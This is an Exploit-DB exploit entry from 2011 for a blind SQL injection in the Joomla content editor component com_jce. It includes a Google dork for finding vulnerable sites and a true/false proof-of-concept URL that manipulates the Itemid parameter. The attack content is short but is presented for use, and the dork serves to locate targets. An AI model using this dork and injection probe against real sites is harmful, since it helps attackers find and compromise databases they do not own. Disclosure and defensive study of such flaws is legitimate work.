Joomla! Component joomlacontenteditor - Blind SQL Injection

Author: eidelweiss
type: webapps
platform: php
port: 
date_added: 2011-04-09  
date_updated: 2017-01-09  
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.complg_jce_15711.zip  

raw file: 17136.txt  

===================================================================
  joomlacontenteditor (com_jce) BLIND sql injection vulnerability
===================================================================

Software:   joomlacontenteditor (com_jce)
Vendor:     www.joomlacontenteditor.net
Vuln Type:  BLind SQL Injection
Download link:  http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
Dork:       inurl:"/index.php?option=com_jce"


References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html


===================================================================

Description:

JCE makes creating and editing Joomla!®
content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS...

===================================================================

    exploit & p0c

[!] index.php?option=com_jce&Itemid=[valid Itemid]

    Example p0c

[!] http://host/index.php?option=com_jce&Itemid=8    <= True
[!] http://host/index.php?option=com_jce&Itemid=-8   <= False


====================================================================

    Nothing Impossible In This World Even Nobody`s Perfect

===================================================================

==========================| -=[ E0F ]=- |==========================